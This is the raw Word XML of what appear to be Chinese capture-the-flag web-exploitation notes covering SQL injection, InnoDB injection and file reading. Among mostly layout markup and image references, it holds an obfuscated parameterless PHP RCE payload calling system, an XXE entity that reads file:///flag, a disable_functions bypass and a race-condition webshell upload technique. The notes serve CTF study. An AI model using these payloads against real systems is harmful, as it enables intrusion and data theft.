                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2677160" cy="1259840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里有两点需要注意一下:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>列名需要用``包裹起来</w:t>
      </w:r>
    </w:p>
    <w:p>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30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2879090" cy="1806575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="217424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密码加密绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc27669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1026" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId33" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1468075726" r:id="rId32">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27" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:47.5pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId35" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1468075727" r:id="rId34">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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28" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:91.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId37" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1468075728" r:id="rId36">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1029" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:46.7pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId39" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1468075729" r:id="rId38">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc586"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.二次注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>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40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2774950" cy="15176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41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3028950" cy="146685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42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4178300" cy="1517650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3143250" cy="14224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44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4343400" cy="14859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45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4356100" cy="142240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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拼接后得到完整flag</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46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="179895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47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="4368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48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271770" cy="163830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>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49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="216535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc1612"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.InnoDB注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>爆表脚本(注意修改url)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1030" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:75.05pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId51" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1468075730" r:id="rId50">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc2455"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四.文件读取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc26670"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>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ThinkPHP漏洞：读取根目录文件传入：</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>读取文件传入：</w:t>
      </w:r>
    </w:p>
    <w:p>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文件读取绕过指定参数名称：</w:t>
      </w:r>
    </w:p>
    <w:p>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52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="1532890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5262880" cy="1981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无参RCE打法：</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pos() 输出数组中的当前元素的值。</w:t>
      </w:r>
    </w:p>
    <w:p>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273675" cy="6438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55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="10033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56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="177927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57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273675" cy="148526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phpinfo中可能存在flag文件名称</w:t>
      </w:r>
    </w:p>
    <w:p>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58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="18167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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&amp;pi=system&amp;abs=cat /flag</w:t>
      </w:r>
    </w:p>
    <w:p>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="324485"/>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蚁剑disable_functions绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>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60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648200" cy="42481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61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3124200" cy="33020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putenv('PATH=...');绕过：使用/bin/cat /flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="utf-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE note [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY admin SYSTEM "file:///flag"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后将其中一项参数改为&amp;admin;</w:t>
      </w:r>
    </w:p>
    <w:p>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="17049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63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="471614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64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="364553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65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="302387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66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="54102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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="20986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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3633470" cy="1904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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273675" cy="1170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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3656965" cy="89535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unlink()文件上传绕过：利用python脚本一直上传一句话木马，同时BP拦截不断请求一句话木马位置，打时间差利用蚁剑getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc4020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.JAVA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>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71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5261610" cy="17805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读取文件：/WEB-INF/web.xml</w:t>
      </w:r>
    </w:p>
    <w:p>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72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="48964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73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="99187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15" w:name="_Toc6452"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.PYTHON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>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74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="1405255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc24237"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.NGINX</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>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75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273675" cy="258445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
